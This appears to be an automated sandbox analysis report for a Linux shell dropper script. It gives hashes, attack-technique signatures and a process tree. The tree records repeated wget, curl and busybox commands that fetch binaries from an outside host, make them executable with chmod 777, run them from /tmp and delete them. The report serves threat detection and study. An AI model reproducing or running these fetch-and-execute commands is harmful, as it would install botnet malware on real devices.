Analysis
-
max time kernel
104s -
max time network
109s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:13
Static task
static1
Behavioral task
behavioral1
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
-
Size
10KB
-
MD5
85d74baef7ce93fd942b1abca31bf2dd
-
SHA1
a7e677437c07ce76e9242021261bc10ae3c1728e
-
SHA256
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1
-
SHA512
01166c5328b88a37c6f813c2c230bfb8ab099386a4d9d45d663902833009e012859aa7452ea9d9bff524dc0bf6f3dd938c0df0225b65ece29ab5a364e10a5677
-
SSDEEP
192:ffd11BAjT2qH0+mhJy/EN71BAjTx9wrKS:ffdJqU+mhJy/ENqyrKS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 786 chmod 885 chmod 955 chmod 976 chmod 730 chmod 827 chmod 969 chmod 997 chmod 773 chmod 927 chmod 934 chmod 983 chmod 899 chmod 737 chmod 744 chmod 906 chmod 892 chmod 913 chmod 920 chmod 990 chmod 838 chmod 948 chmod 820 chmod 856 chmod 872 chmod 941 chmod 962 chmod 755 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d 731 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h 738 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae 745 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd 756 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 774 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i 788 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u 821 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv 828 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd 839 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo 858 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj 873 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC 886 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH 893 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 900 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d 907 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h 914 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae 921 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd 928 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 935 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i 942 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u 949 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv 956 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd 963 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo 970 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj 977 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC 984 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH 991 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 998 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 826 busybox 889 curl 891 busybox 966 curl 776 wget 823 wget 831 curl 876 wget 924 curl 839 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd 869 busybox 884 busybox 898 busybox 915 rm 747 wget 910 curl 926 busybox 937 wget 944 wget 958 wget 748 curl 860 wget 919 busybox 923 wget 940 busybox 738 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h 854 busybox 912 busybox 945 curl 975 busybox 728 busybox 917 curl 938 curl 965 wget 980 curl 987 curl 722 curl 785 busybox 791 wget 840 rm 842 wget 914 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h 982 busybox 989 busybox 824 curl 830 wget 896 curl 902 wget 909 wget 954 busybox 741 curl 743 busybox 968 busybox 993 wget 779 curl 846 curl 903 curl 916 wget 959 curl 972 wget 736 busybox 951 wget 979 wget 740 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj curl File opened for modification /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae curl File opened for modification /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 curl File opened for modification /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h curl File opened for modification /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 curl File opened for modification /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u curl File opened for modification /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd curl File opened for modification /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h curl File opened for modification /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 curl File opened for modification /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv curl File opened for modification /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae curl File opened for modification /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC curl File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d curl File opened for modification /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd curl File opened for modification /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo curl File opened for modification /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u curl File opened for modification /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH curl File opened for modification /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv curl File opened for modification /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 curl File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d curl File opened for modification /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd curl File opened for modification /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd curl File opened for modification /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i curl File opened for modification /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo curl File opened for modification /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj curl File opened for modification /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC curl File opened for modification /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH curl File opened for modification /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i curl
Processes
-
/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh1⤵PID:698
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:706
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:728
-
-
/bin/chmodchmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:732
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵PID:733
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:736
-
-
/bin/chmodchmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:738
-
-
/bin/rmrm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵PID:739
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:740
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:752
-
-
/bin/chmodchmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:757
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:758
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:770
-
-
/bin/chmodchmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:775
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:776
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:785
-
-
/bin/chmodchmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:791
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:819
-
-
/bin/chmodchmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:822
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:823
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:826
-
-
/bin/chmodchmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵PID:829
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:830
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:835
-
-
/bin/chmodchmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:839
-
-
/bin/rmrm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:854
-
-
/bin/chmodchmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵PID:859
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:891
-
-
/bin/chmodchmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:905
-
-
/bin/chmodchmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:914
-
-
/bin/rmrm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:930
-
-
